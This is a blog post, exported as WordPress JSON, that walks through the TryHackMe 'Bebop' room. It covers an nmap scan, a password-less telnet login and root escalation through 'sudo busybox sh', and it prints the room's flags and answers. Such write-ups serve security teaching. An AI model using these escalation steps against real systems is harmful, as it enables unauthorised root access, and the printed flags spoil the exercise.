{"id":1835,"date":"2025-03-05T15:50:35","date_gmt":"2025-03-05T20:50:35","guid":{"rendered":"https:\/\/www.peteonsoftware.com\/?p=1835"},"modified":"2025-03-05T15:50:35","modified_gmt":"2025-03-05T20:50:35","slug":"tryhackme-room-walkthrough-bebop","status":"publish","type":"post","link":"https:\/\/www.peteonsoftware.com\/index.php\/2025\/03\/05\/tryhackme-room-walkthrough-bebop\/","title":{"rendered":"TryHackMe Room Walkthrough: Bebop"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/peteonsoftware.com\/images\/2025\/bebop.jpg\" alt=\"An evil drone, representing the drone in this exercise\" title=\"An evil drone, representing the drone in this exercise\" style=\"float:left;margin:.5rem;\">Today, we&#8217;re going to work our way through another TryHackMe room called <a href=\"https:\/\/tryhackme.com\/room\/bebop\">Bebop<\/a>.  This one isn&#8217;t in the Free Tier, but it is considered &#8220;Easy&#8221; and is a &#8220;Walkthrough Room&#8221; rather than a &#8220;Challenge Room&#8221;.  Because of that, there will be some additional questions in addition to just posting User and Root flags.  Getting started, the room description says, &#8220;Who thought making a flying shell was a good idea?&#8221;.  For the first task, it reads, &#8220;For this mission, you have been assigned the codename &#8216;pilot&#8217;.  
Press the Start Machine button to make the drone takeoff!&#8221;.<br \/>\n<br style=\"clear:both;\"><\/p>\n<h3>Task 1<\/h3>\n<p><strong>&#8220;Deploy the machine.&#8221;<\/strong> &#8211; <em>No answer needed<\/em><br \/>\n<strong>&#8220;What is your codename?&#8221;<\/strong> &#8211; <em>pilot<\/em><\/p>\n<h3>Task 2<\/h3>\n<p>With the machine started and enough time elapsed, I first ran an nmap scan to see what we were dealing with.<\/p>\n<pre>\r\n~# nmap -sCV -T4 10.10.194.21\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2025-03-05 16:25 GMT\r\nNmap scan report for 10.10.194.21\r\nHost is up (0.0013s latency).\r\nNot shown: 998 closed ports\r\nPORT   STATE SERVICE VERSION\r\n22\/tcp open  ssh     OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0)\r\n| ssh-hostkey: \r\n|   2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA)\r\n|   256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA)\r\n|_  256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519)\r\n23\/tcp open  telnet  BSD-derived telnetd\r\nMAC Address: 02:D4:65:95:48:91 (Unknown)\r\nService Info: OS: FreeBSD; CPE: cpe:\/o:freebsd:freebsd\r\n\r\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\r\nNmap done: 1 IP address (1 host up) scanned in 15.44 seconds\r\n<\/pre>\n<p>So, ports 22 (SSH) and 23 (telnet) are open.  SSH is rarely the initial way in without any other information, so let&#8217;s try telnet, remembering our username of pilot that they&#8217;ve already told us and then asked us about.  Connecting, I was asked for a login and I typed <em>pilot<\/em>.  This immediately got me to an interactive session.  
So, they meant <strong>Easy<\/strong> easy on this one.<\/p>\n<pre>\r\nroot@ip-10-10-235-128:~# telnet 10.10.194.21\r\nTrying 10.10.194.21...\r\nConnected to 10.10.194.21.\r\nEscape character is '^]'.\r\nlogin: pilot\r\nLast login: Sat Oct  5 23:48:53 from cpc147224-roth10-2-0-cust456.17-1.cable.virginm.net\r\nFreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr  4 02:07:22 UTC 2019\r\n\r\nWelcome to FreeBSD!\r\n\r\nRelease Notes, Errata: https:\/\/www.FreeBSD.org\/releases\/\r\nSecurity Advisories:   https:\/\/www.FreeBSD.org\/security\/\r\nFreeBSD Handbook:      https:\/\/www.FreeBSD.org\/handbook\/\r\nFreeBSD FAQ:           https:\/\/www.FreeBSD.org\/faq\/\r\nQuestions List: https:\/\/lists.FreeBSD.org\/mailman\/listinfo\/freebsd-questions\/\r\nFreeBSD Forums:        https:\/\/forums.FreeBSD.org\/\r\n\r\nDocuments installed with the system are in the \/usr\/local\/share\/doc\/freebsd\/\r\ndirectory, or can be installed later with:  pkg install en-freebsd-doc\r\nFor other languages, replace \"en\" with a language code like de or fr.\r\n\r\nShow the version of FreeBSD installed:  freebsd-version ; uname -a\r\nPlease include that output and any error messages when posting questions.\r\nIntroduction to manual pages:  man man\r\nFreeBSD directory layout:      man hier\r\n\r\nEdit \/etc\/motd to change this login announcement.\r\nWant to strip UTF-8 BOM(Byte Order Mark) from given files?\r\n\r\n\tsed -e '1s\/^\\xef\\xbb\\xbf\/\/' < bomfile > newfile\r\n[pilot@freebsd ~]$ \r\n<\/pre>\n<p>Doing an <em>ls<\/em> shows me that we can see the user.txt file in our directory and <em>cat<\/em>-ing it out gives us the first answer of Task 2.<br \/>\nOkay, so we&#8217;re already at a command prompt.  No issues here.  
<\/p>\n<pre>\r\n[pilot@freebsd ~]$ ls\r\nuser.txt\r\n[pilot@freebsd ~]$ cat user.txt\r\nTHM{r3m0v3_b3f0r3_fl16h7}\r\n<\/pre>\n<p><strong>What is the User Flag?<\/strong> &#8211; <em>THM{r3m0v3_b3f0r3_fl16h7}<\/em><\/p>\n<p>Moving on, we need to see what we can do to elevate our privileges to root to get the root flag.  One of the first things I usually do is <em>sudo -l<\/em> to see what we can run as <em>sudo<\/em>.  Since we didn&#8217;t use a password to log in, we didn&#8217;t know the password if there was one.  Luckily, it didn&#8217;t ask us for one to run this command.<\/p>\n<pre>\r\n[pilot@freebsd ~]$ sudo -l\r\nUser pilot may run the following commands on freebsd:\r\n    (root) NOPASSWD: \/usr\/local\/bin\/busybox\r\n<\/pre>\n<p>Okay, so we can run the binary <em>busybox<\/em> with <em>sudo<\/em> as root with no password.  Is that useful?  This is where I check my favorite PrivEsc companion GTFOBins to see.  You can find the entry for <em>busybox<\/em> <a href=\"https:\/\/gtfobins.github.io\/gtfobins\/busybox\/\">here<\/a>.  Taking a small aside, <em>busybox<\/em> is a utility that you often find in embedded systems that contains its own implementations of things like <em>ls<\/em>, <em>sh<\/em>, <em>mv<\/em>, etc.  In these systems, you can execute the commands by calling <em>busybox {command}<\/em>, or &#8211; quite often &#8211; the person who set up the system will symlink <em>ls<\/em> to just call <em>busybox ls<\/em>, like this: <em>ln -s \/bin\/busybox \/bin\/ls<\/em>, so you might not even know that <em>busybox<\/em> is involved.  This would allow you to only have one binary instead of many, with an overall size savings.  
<\/p>\n<p>In this case, that means if I call <em>sudo busybox sh<\/em>, I&#8217;ll get a shell opened as root, which is just what happened.<\/p>\n<pre>\r\n[pilot@freebsd ~]$ sudo busybox sh\r\n# whoami\r\nroot\r\n<\/pre>\n<p>From there, we navigate to the root directory and <em>cat<\/em> out the file.<\/p>\n<pre>\r\n# cd \/root\r\n# ls\r\n.bash_history\t.history\t.login\t\troot.txt\r\n.cshrc\t\t.k5login\t.profile\r\n# cat root.txt\r\nTHM{h16hw4y_70_7h3_d4n63r_z0n3}\r\n<\/pre>\n<p><strong>What is the Root Flag?<\/strong> &#8211; <em>THM{h16hw4y_70_7h3_d4n63r_z0n3}<\/em><\/p>\n<h3>Task 3<\/h3>\n<p><strong>What is the low privileged user?<\/strong> &#8211; <em>pilot<\/em><br \/>\n<strong>What binary was used to escalate privileges?<\/strong> &#8211; <em>busybox<\/em><br \/>\n<strong>What service was used to gain an initial shell?<\/strong> &#8211; <em>telnet<\/em><\/p>\n<p>Last question, we already knew from what we saw in our nmap scan and also at the dump of information at our login prompt, but you can always check this way from within the system itself.<\/p>\n<pre>\r\n# uname -a\r\nFreeBSD freebsd 11.2-STABLE FreeBSD 11.2-STABLE #0 r345837: Thu Apr  4 02:07:22 UTC 2019     root@releng2.nyi.freebsd.org:\/usr\/obj\/usr\/src\/sys\/GENERIC  amd64\r\n<\/pre>\n<p><strong>What Operating System does the drone run?<\/strong> &#8211; <em>FreeBSD<\/em><\/p>\n<p>That&#8217;s it.  The most basic of rooms, but a pretty good entry point into some basic recon and basic PrivEsc if you&#8217;re new to this.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Today, we&#8217;re going to work our way through another TryHackMe room called Bebop. This one isn&#8217;t in the Free Tier, but it is considered &#8220;Easy&#8221; and is a &#8220;Walkthrough Room&#8221; rather than a &#8220;Challenge Room&#8221;. 
Because &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[153],"tags":[142,149,134],"class_list":["post-1835","post","type-post","status-publish","format-standard","hentry","category-capture-the-flag","tag-infosec","tag-offensive-security","tag-security"],"_links":{"self":[{"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/posts\/1835","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/comments?post=1835"}],"version-history":[{"count":0,"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/posts\/1835\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/media?parent=1835"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/categories?post=1835"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.peteonsoftware.com\/index.php\/wp-json\/wp\/v2\/tags?post=1835"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}